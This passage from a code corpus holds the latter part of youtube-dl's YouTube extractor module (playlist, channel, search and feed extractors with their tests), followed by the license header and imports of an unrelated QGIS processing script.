dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
# Additional DASH manifests may end up in HTTP Error 403, so allow them
# to fail without a bug report message if some DASH manifest has already
# succeeded. This is a temporary workaround to reduce the burst of bug
# reports until we figure out the reason and whether it can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH sources; they
# contain less info and can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/rg3/youtube-dl/issues/5774 for an example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
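# --- Illustrative sketch (editor's addition, not part of youtube-dl) --------
# The dictionary returned by _real_extract() above is a standard info dict.
# Callers normally go through the embedding API rather than instantiating
# YoutubeIE directly, roughly as below. The option values and the helper name
# are assumptions for demonstration only.
def _example_consume_info_dict(url='https://www.youtube.com/watch?v=BaW_jenozKc'):
    from youtube_dl import YoutubeDL  # deferred import to avoid a cycle at load time
    ydl = YoutubeDL({'quiet': True, 'skip_download': True})
    info = ydl.extract_info(url, download=False)
    # A few of the fields populated by the return statement above.
    return info.get('title'), info.get('uploader'), len(info.get('formats') or [])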
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
youtube\.com/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
# The mixes are generated from a single video
# the id of the playlist is just 'RD' + video_id
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
# Fetch new pages until all the videos are repeated, it seems that
# there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/rg3/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/rg3/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
        # Channel-by-page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778).
        # Work around this by extracting as a playlist if we managed to obtain the channel playlist URL,
        # otherwise fall back on channel-by-page extraction.
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
# The videos are contained in a single page
# the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
        # Don't return True if the URL can be extracted by another YouTube
        # extractor; this regex is too permissive and would match it.
        other_yt_ies = iter(
            klass for (name, klass) in globals().items()
            if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
    # There doesn't appear to be a real limit; for example, if you search for
    # 'python' you get more than 8,000,000 results.
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
            # The 'recommended' feed has an infinite 'load more' and each new portion
            # spins the same videos in a (sometimes) slightly different order, so check
            # for uniqueness and break when a portion has no new videos.
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| gpl-3.0 |
michaelkirk/QGIS | python/plugins/processing/algs/qgis/PointsInPolygonWeighted.py | 1 | 5085 | # -*- coding: utf-8 -*-
"""
***************************************************************************
    PointsInPolygonWeighted.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeatureRequest, QgsFeature, QgsGeometry
